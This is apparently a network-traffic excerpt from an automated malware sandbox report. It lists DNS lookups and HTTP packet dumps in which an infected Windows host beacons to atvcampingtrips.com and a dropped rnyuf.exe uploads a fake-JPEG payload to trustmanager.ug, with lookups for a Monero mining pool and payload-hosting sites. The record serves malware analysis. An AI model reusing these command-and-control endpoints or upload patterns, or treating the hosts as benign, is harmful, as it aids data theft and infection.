Aug 23, 2021 02:09:07.344168901 CEST	8.8.8.8	192.168.2.3	0x4ce7	No error (0)	atvcampingtrips.com		170.84.181.70	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:08.890104055 CEST	8.8.8.8	192.168.2.3	0xd8a5	No error (0)	atvcampingtrips.com		222.236.49.124	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:08.890104055 CEST	8.8.8.8	192.168.2.3	0xd8a5	No error (0)	atvcampingtrips.com		211.170.70.236	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:08.890104055 CEST	8.8.8.8	192.168.2.3	0xd8a5	No error (0)	atvcampingtrips.com		211.53.230.69	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:08.890104055 CEST	8.8.8.8	192.168.2.3	0xd8a5	No error (0)	atvcampingtrips.com		124.109.61.160	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:08.890104055 CEST	8.8.8.8	192.168.2.3	0xd8a5	No error (0)	atvcampingtrips.com		170.84.181.70	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:08.890104055 CEST	8.8.8.8	192.168.2.3	0xd8a5	No error (0)	atvcampingtrips.com		220.125.1.129	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:08.890104055 CEST	8.8.8.8	192.168.2.3	0xd8a5	No error (0)	atvcampingtrips.com		115.91.207.131	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:08.890104055 CEST	8.8.8.8	192.168.2.3	0xd8a5	No error (0)	atvcampingtrips.com		187.156.128.15	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:08.890104055 CEST	8.8.8.8	192.168.2.3	0xd8a5	No error (0)	atvcampingtrips.com		218.233.73.202	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:08.890104055 CEST	8.8.8.8	192.168.2.3	0xd8a5	No error (0)	atvcampingtrips.com		211.169.6.249	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:10.517839909 CEST	8.8.8.8	192.168.2.3	0x22fb	No error (0)	atvcampingtrips.com		222.236.49.124	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:10.517839909 CEST	8.8.8.8	192.168.2.3	0x22fb	No error (0)	atvcampingtrips.com		211.170.70.236	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:10.517839909 CEST	8.8.8.8	192.168.2.3	0x22fb	No error (0)	atvcampingtrips.com		211.53.230.69	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:10.517839909 CEST	8.8.8.8	192.168.2.3	0x22fb	No error (0)	atvcampingtrips.com		124.109.61.160	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:10.517839909 CEST	8.8.8.8	192.168.2.3	0x22fb	No error (0)	atvcampingtrips.com		170.84.181.70	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:10.517839909 CEST	8.8.8.8	192.168.2.3	0x22fb	No error (0)	atvcampingtrips.com		220.125.1.129	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:10.517839909 CEST	8.8.8.8	192.168.2.3	0x22fb	No error (0)	atvcampingtrips.com		115.91.207.131	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:10.517839909 CEST	8.8.8.8	192.168.2.3	0x22fb	No error (0)	atvcampingtrips.com		187.156.128.15	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:10.517839909 CEST	8.8.8.8	192.168.2.3	0x22fb	No error (0)	atvcampingtrips.com		218.233.73.202	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:10.517839909 CEST	8.8.8.8	192.168.2.3	0x22fb	No error (0)	atvcampingtrips.com		211.169.6.249	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:11.728424072 CEST	8.8.8.8	192.168.2.3	0x5129	No error (0)	atvcampingtrips.com		220.125.1.129	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:11.728424072 CEST	8.8.8.8	192.168.2.3	0x5129	No error (0)	atvcampingtrips.com		115.91.207.131	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:11.728424072 CEST	8.8.8.8	192.168.2.3	0x5129	No error (0)	atvcampingtrips.com		187.156.128.15	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:11.728424072 CEST	8.8.8.8	192.168.2.3	0x5129	No error (0)	atvcampingtrips.com		218.233.73.202	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:11.728424072 CEST	8.8.8.8	192.168.2.3	0x5129	No error (0)	atvcampingtrips.com		211.169.6.249	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:11.728424072 CEST	8.8.8.8	192.168.2.3	0x5129	No error (0)	atvcampingtrips.com		222.236.49.124	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:11.728424072 CEST	8.8.8.8	192.168.2.3	0x5129	No error (0)	atvcampingtrips.com		211.170.70.236	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:11.728424072 CEST	8.8.8.8	192.168.2.3	0x5129	No error (0)	atvcampingtrips.com		211.53.230.69	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:11.728424072 CEST	8.8.8.8	192.168.2.3	0x5129	No error (0)	atvcampingtrips.com		124.109.61.160	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:11.728424072 CEST	8.8.8.8	192.168.2.3	0x5129	No error (0)	atvcampingtrips.com		170.84.181.70	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:13.678126097 CEST	8.8.8.8	192.168.2.3	0xb658	No error (0)	atvcampingtrips.com		222.236.49.124	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:13.678126097 CEST	8.8.8.8	192.168.2.3	0xb658	No error (0)	atvcampingtrips.com		211.170.70.236	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:13.678126097 CEST	8.8.8.8	192.168.2.3	0xb658	No error (0)	atvcampingtrips.com		211.53.230.69	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:13.678126097 CEST	8.8.8.8	192.168.2.3	0xb658	No error (0)	atvcampingtrips.com		124.109.61.160	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:13.678126097 CEST	8.8.8.8	192.168.2.3	0xb658	No error (0)	atvcampingtrips.com		170.84.181.70	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:13.678126097 CEST	8.8.8.8	192.168.2.3	0xb658	No error (0)	atvcampingtrips.com		220.125.1.129	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:13.678126097 CEST	8.8.8.8	192.168.2.3	0xb658	No error (0)	atvcampingtrips.com		115.91.207.131	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:13.678126097 CEST	8.8.8.8	192.168.2.3	0xb658	No error (0)	atvcampingtrips.com		187.156.128.15	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:13.678126097 CEST	8.8.8.8	192.168.2.3	0xb658	No error (0)	atvcampingtrips.com		218.233.73.202	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:13.678126097 CEST	8.8.8.8	192.168.2.3	0xb658	No error (0)	atvcampingtrips.com		211.169.6.249	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:15.906353951 CEST	8.8.8.8	192.168.2.3	0xa8d7	No error (0)	atvcampingtrips.com		218.233.73.202	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:15.906353951 CEST	8.8.8.8	192.168.2.3	0xa8d7	No error (0)	atvcampingtrips.com		211.169.6.249	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:15.906353951 CEST	8.8.8.8	192.168.2.3	0xa8d7	No error (0)	atvcampingtrips.com		222.236.49.124	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:15.906353951 CEST	8.8.8.8	192.168.2.3	0xa8d7	No error (0)	atvcampingtrips.com		211.170.70.236	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:15.906353951 CEST	8.8.8.8	192.168.2.3	0xa8d7	No error (0)	atvcampingtrips.com		211.53.230.69	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:15.906353951 CEST	8.8.8.8	192.168.2.3	0xa8d7	No error (0)	atvcampingtrips.com		124.109.61.160	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:15.906353951 CEST	8.8.8.8	192.168.2.3	0xa8d7	No error (0)	atvcampingtrips.com		170.84.181.70	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:15.906353951 CEST	8.8.8.8	192.168.2.3	0xa8d7	No error (0)	atvcampingtrips.com		220.125.1.129	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:15.906353951 CEST	8.8.8.8	192.168.2.3	0xa8d7	No error (0)	atvcampingtrips.com		115.91.207.131	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:15.906353951 CEST	8.8.8.8	192.168.2.3	0xa8d7	No error (0)	atvcampingtrips.com		187.156.128.15	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:17.455415010 CEST	8.8.8.8	192.168.2.3	0xc48	No error (0)	atvcampingtrips.com		222.236.49.124	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:17.455415010 CEST	8.8.8.8	192.168.2.3	0xc48	No error (0)	atvcampingtrips.com		211.170.70.236	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:17.455415010 CEST	8.8.8.8	192.168.2.3	0xc48	No error (0)	atvcampingtrips.com		211.53.230.69	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:17.455415010 CEST	8.8.8.8	192.168.2.3	0xc48	No error (0)	atvcampingtrips.com		124.109.61.160	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:17.455415010 CEST	8.8.8.8	192.168.2.3	0xc48	No error (0)	atvcampingtrips.com		170.84.181.70	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:17.455415010 CEST	8.8.8.8	192.168.2.3	0xc48	No error (0)	atvcampingtrips.com		220.125.1.129	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:17.455415010 CEST	8.8.8.8	192.168.2.3	0xc48	No error (0)	atvcampingtrips.com		115.91.207.131	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:17.455415010 CEST	8.8.8.8	192.168.2.3	0xc48	No error (0)	atvcampingtrips.com		187.156.128.15	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:17.455415010 CEST	8.8.8.8	192.168.2.3	0xc48	No error (0)	atvcampingtrips.com		218.233.73.202	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:17.455415010 CEST	8.8.8.8	192.168.2.3	0xc48	No error (0)	atvcampingtrips.com		211.169.6.249	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:17.598347902 CEST	8.8.8.8	192.168.2.3	0x19e1	No error (0)	waskitaprecast.co.id		103.229.73.120	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:18.705981970 CEST	8.8.8.8	192.168.2.3	0x41e	No error (0)	atvcampingtrips.com		222.236.49.124	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:18.705981970 CEST	8.8.8.8	192.168.2.3	0x41e	No error (0)	atvcampingtrips.com		211.170.70.236	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:18.705981970 CEST	8.8.8.8	192.168.2.3	0x41e	No error (0)	atvcampingtrips.com		211.53.230.69	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:18.705981970 CEST	8.8.8.8	192.168.2.3	0x41e	No error (0)	atvcampingtrips.com		124.109.61.160	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:18.705981970 CEST	8.8.8.8	192.168.2.3	0x41e	No error (0)	atvcampingtrips.com		170.84.181.70	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:18.705981970 CEST	8.8.8.8	192.168.2.3	0x41e	No error (0)	atvcampingtrips.com		220.125.1.129	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:18.705981970 CEST	8.8.8.8	192.168.2.3	0x41e	No error (0)	atvcampingtrips.com		115.91.207.131	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:18.705981970 CEST	8.8.8.8	192.168.2.3	0x41e	No error (0)	atvcampingtrips.com		187.156.128.15	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:18.705981970 CEST	8.8.8.8	192.168.2.3	0x41e	No error (0)	atvcampingtrips.com		218.233.73.202	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:18.705981970 CEST	8.8.8.8	192.168.2.3	0x41e	No error (0)	atvcampingtrips.com		211.169.6.249	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:20.824301004 CEST	8.8.8.8	192.168.2.3	0xe556	No error (0)	api.ip.sb	api.ip.sb.cdn.cloudflare.net		CNAME (Canonical name)	IN (0x0001)
Aug 23, 2021 02:09:20.875869036 CEST	8.8.8.8	192.168.2.3	0xf73d	No error (0)	api.ip.sb	api.ip.sb.cdn.cloudflare.net		CNAME (Canonical name)	IN (0x0001)
Aug 23, 2021 02:09:30.267977953 CEST	8.8.8.8	192.168.2.3	0x270	No error (0)	iplogger.org		88.99.66.31	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:30.577874899 CEST	8.8.8.8	192.168.2.3	0xb879	No error (0)	bitbucket.org		104.192.141.1	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:31.395144939 CEST	8.8.8.8	192.168.2.3	0xb954	No error (0)	bbuseruploads.s3.amazonaws.com	s3-1-w.amazonaws.com		CNAME (Canonical name)	IN (0x0001)
Aug 23, 2021 02:09:31.395144939 CEST	8.8.8.8	192.168.2.3	0xb954	No error (0)	s3-1-w.amazonaws.com	s3-w.us-east-1.amazonaws.com		CNAME (Canonical name)	IN (0x0001)
Aug 23, 2021 02:09:31.395144939 CEST	8.8.8.8	192.168.2.3	0xb954	No error (0)	s3-w.us-east-1.amazonaws.com		52.217.103.172	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:33.694899082 CEST	8.8.8.8	192.168.2.3	0xaae8	No error (0)	api.ip.sb	api.ip.sb.cdn.cloudflare.net		CNAME (Canonical name)	IN (0x0001)
Aug 23, 2021 02:09:33.738157034 CEST	8.8.8.8	192.168.2.3	0x2851	No error (0)	api.ip.sb	api.ip.sb.cdn.cloudflare.net		CNAME (Canonical name)	IN (0x0001)
Aug 23, 2021 02:09:35.375576019 CEST	8.8.8.8	192.168.2.3	0x3c6a	No error (0)	xmr.2miners.com		51.89.96.41	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:59.265465021 CEST	8.8.8.8	192.168.2.3	0x91eb	No error (0)	api.ip.sb	api.ip.sb.cdn.cloudflare.net		CNAME (Canonical name)	IN (0x0001)
Aug 23, 2021 02:09:59.300663948 CEST	8.8.8.8	192.168.2.3	0x7cf7	No error (0)	api.ip.sb	api.ip.sb.cdn.cloudflare.net		CNAME (Canonical name)	IN (0x0001)

HTTP Request Dependency Graph

atvcampingtrips.com

193.142.59.123

185.215.113.206

trustmanager.ug

cdn.discordapp.com

188.124.36.242:25802

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49708	218.233.73.202	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:07:55.076476097 CEST	1562	OUT	POST /upload/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://atvcampingtrips.com/upload/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 281 Host: atvcampingtrips.com
Aug 23, 2021 02:07:55.076504946 CEST	1563	OUT	Data Raw: 39 6e 51 18 83 cb 1e 26 db af c9 71 00 01 7f bc 7d 7e ca 94 63 73 e5 16 0f 7e 78 e2 32 c5 ce 6e ef 29 b4 20 76 65 2b 1a ef 97 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 28 44 df 8f Data Ascii: 9nQ&q}~cs~x2n) ve+?*$`7C[zqNA .[k,vu(DD;a^Nt=~d)-Y5NA<TpR(Z: A\|5z8{+JzmGCc?0/WqAqu'FPzC>73=)
Aug 23, 2021 02:07:56.020724058 CEST	1564	IN	HTTP/1.0 404 Not Found Date: Mon, 23 Aug 2021 00:07:55 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 X-Powered-By: PHP/5.6.40 Content-Length: 8 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 04 00 00 00 70 e8 86 e4 Data Ascii: p

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49709	218.233.73.202	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:07:56.357016087 CEST	1565	OUT	POST /upload/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://atvcampingtrips.com/upload/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 224 Host: atvcampingtrips.com
Aug 23, 2021 02:07:56.357050896 CEST	1565	OUT	Data Raw: 39 6e 51 18 83 cb 1e 26 db af c9 71 00 01 7f bc 7d 7e ca 94 63 73 e5 16 0f 7e 78 e2 32 c5 ce 6e ef 29 b4 20 76 65 2b 1a ef 97 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0a 6b 2c 90 f5 76 0b 75 65 0c ca fd Data Ascii: 9nQ&q}~cs~x2n) ve+?$`7C[zqNA -[k,vuesR]Oq1$aJEIaVi!KMyA"N@G I=Txo3[GlGl{ziYl
Aug 23, 2021 02:07:57.339543104 CEST	1566	IN	HTTP/1.0 404 Not Found Date: Mon, 23 Aug 2021 00:07:56 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 X-Powered-By: PHP/5.6.40 Content-Length: 334 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 70 6c 6f 61 64 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /upload/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.2.3	49732	218.233.73.202	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:08:33.535335064 CEST	8619	OUT	POST /upload/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://atvcampingtrips.com/upload/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 139 Host: atvcampingtrips.com
Aug 23, 2021 02:08:33.535353899 CEST	8619	OUT	Data Raw: 39 6e 51 18 83 cb 1e 26 db af c9 71 00 01 7f bc 7d 7e ca 94 63 73 e5 16 0f 7e 78 e2 32 c5 ce 6e ef 29 b4 20 76 65 2b 1a ef 97 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0d 6b 2c 90 f5 76 0b 75 79 04 a5 a0 Data Ascii: 9nQ&q}~cs~x2n) ve+?*$`7C[zqNA -[k,vuyH.Tpr7A,xMn^^ET
Aug 23, 2021 02:08:34.451109886 CEST	8620	IN	HTTP/1.0 404 Not Found Date: Mon, 23 Aug 2021 00:08:34 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 X-Powered-By: PHP/5.6.40 Content-Length: 334 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 70 6c 6f 61 64 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /upload/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
100	192.168.2.3	49826	185.206.180.136	80	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:09:08.485505104 CEST	16880	OUT	POST /k8FppT/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----144fedd53f2aeee09aa4dbce6b6e9e32 Host: trustmanager.ug Content-Length: 93811 Cache-Control: no-cache
Aug 23, 2021 02:09:08.485663891 CEST	16880	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 31 34 34 66 65 64 64 35 33 66 32 61 65 65 65 30 39 61 61 34 64 62 63 65 36 62 36 65 39 65 33 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 Data Ascii: ------144fedd53f2aeee09aa4dbce6b6e9e32Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
Aug 23, 2021 02:09:08.485954046 CEST	16890	OUT	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
Aug 23, 2021 02:09:08.486145973 CEST	16893	OUT	Data Raw: fc b8 7d 9b c9 ce ef 61 bb 38 fc 36 fb d7 05 6e 78 a7 24 df de ff 00 c9 7e 67 55 3e 56 d2 b2 fc 3f cc f9 57 53 55 4d 4a 50 a0 01 90 70 3e 82 aa 55 cd 57 fe 42 53 7e 1f c8 55 3c 57 44 be 26 73 2d 84 a5 a5 a5 34 80 6d 14 b4 b8 a0 06 f6 a5 c5 3b 14 Data Ascii: }a86nx$~gU>V?WSUMJPp>UWBS~U<WD&s-4m;b1KN&(1K)h(bSEv1@;EE%bRPbbPRQv((PF)h4} wLT!Z,;SIVb\mbIv(SIV
Aug 23, 2021 02:09:08.512232065 CEST	16901	OUT	Data Raw: 96 28 a1 96 48 a4 48 e6 52 d1 3b 29 02 40 09 04 a9 ee 32 08 e3 b8 ac 29 50 a7 4a 72 94 34 6f 7f c4 b9 d4 9c e2 94 ba 11 d1 56 ae 34 db fb 48 9e 5b 9b 1b 98 63 49 8c 0e f2 42 ca 16 40 32 50 92 38 6c 73 8e b4 eb 6d 23 53 bc fb 3f d9 74 db c9 fe d2 Data Ascii: (HHR;)@2)PJr4oV4H[cIB@2P8lsm#S?tyP3, rq"KVn4BP}UEKtH=o*[67Vs#b`84]VZ$IN^4}BVd{D__k]Mq!{Ic-AuV2yo$d
Aug 23, 2021 02:09:08.512281895 CEST	16913	OUT	Data Raw: bd a4 52 b6 b5 3b a0 59 59 17 cb 48 81 04 8c e7 39 3c e7 8f 4f 4a f3 f1 7f c4 5e 86 4f 97 da 7b db 58 a3 e2 d4 d2 a0 f1 04 f6 ba 35 bf 95 6b 6d fb 92 de 63 31 91 c7 de 6e 49 ef c7 1c 71 5e 9b a8 bd 88 d5 2e c3 db dc 16 f3 9f 24 4e a0 13 b8 f6 d9 Data Ascii: R;YYH9<OJ^O{X5kmc1nIq^.$N^e/T48XP6~0y{?n?rykn>e]EFv"u;m:_65O/Okoddo?Z;%.vvWF[Hz("
Aug 23, 2021 02:09:08.512301922 CEST	16915	OUT	Data Raw: a0 9f a0 1e b9 c3 9a ad bf ae df e6 6f cb 4a fb ff 00 57 ff 00 22 be ad 6d a4 ae 91 fd a9 a4 bd e1 b6 93 53 9a d2 11 72 ca 58 c4 89 19 0c 70 a3 e6 25 c9 fa 60 76 c9 d8 d5 7c 3d a5 e9 6b ac 32 45 a9 5f ad 95 ec b6 ce 6d a5 4d d6 48 a0 6c 92 65 d8 Data Ascii: oJW"mSrXp%`v\|=k2E_mMHleK+yFrxWc:}wqv.xIuvWRYx-{v}6iuE;~K(x?l/Wo.i10:<HTU=M^<9aZYi]Aen\|#x
Aug 23, 2021 02:09:08.513248920 CEST	16918	OUT	Data Raw: ce 7f da 35 e7 65 0b de 99 ef 67 2e fe cf d0 f4 2b 2e 3e 1d c1 f5 1f ce b9 99 2b a4 b4 38 f8 77 6d ee 7f ad 72 f2 b9 04 fb 56 98 45 ef 4f d5 9c 99 9b b2 87 a2 22 72 41 e0 d2 09 64 1d 1c 8f c6 90 9c d3 6b d1 b2 3c 1e 67 7d 09 d6 ee 55 fe 2c fd 69 Data Ascii: 5eg.+.>+8wmrVEO"rAdk<g}U,ikSUhY.m$c)ci'lT4;kfR}8h/j'ic>pPU\ <M?m%6M=#VmlF\|U}b=Jg3EoISUd.S{U}D[.
Aug 23, 2021 02:09:08.538413048 CEST	16924	OUT	Data Raw: c1 35 d7 1d 06 c2 4f b9 2e 3f 1a 85 fc 30 a7 fd 5c c0 d5 7d 76 9b dc 4f 2c ac b6 39 9e 69 c0 1a dd 7f 0d dc af dd 21 aa bb e8 97 89 ff 00 2c b3 f4 aa 58 9a 6f 66 43 c1 56 8e e8 cc 5e b8 a7 e2 ac b6 9f 70 9d 61 61 f8 53 0c 32 0e a8 47 e1 55 ed 22 Data Ascii: 5O.?0\}vO,9i!,XofCV^paaS2GU"b3[03R6JhJ-Sr@)@e()SK- G]G5 v=4\G:g4Qp:P(u'zZ(AE-u_%ga[HmzS<aq
Aug 23, 2021 02:09:08.538455963 CEST	16926	OUT	Data Raw: 44 f2 b2 5a 51 51 07 1e b4 ed e3 d6 aa e8 56 63 e8 c5 37 78 f5 a3 78 f5 a7 74 2b 31 69 0f 5a 6e f1 9e b4 16 1e b5 37 43 b3 16 8a 66 e1 eb 46 f0 68 ba 1d 98 fa 51 4c dc 3d 69 41 1e b4 5d 0a cc 7d 14 99 1e b4 64 7a d3 ba 15 87 51 8a 68 23 d6 82 c3 Data Ascii: DZQQVc7xxt+1iZn7CfFhQL=iA]}dzQh#XqFi]J&Lw&ER3@<RAL4` K( SbE#-6)MQ,x4i!8SDL#J1jA%-&h&E&iE)*
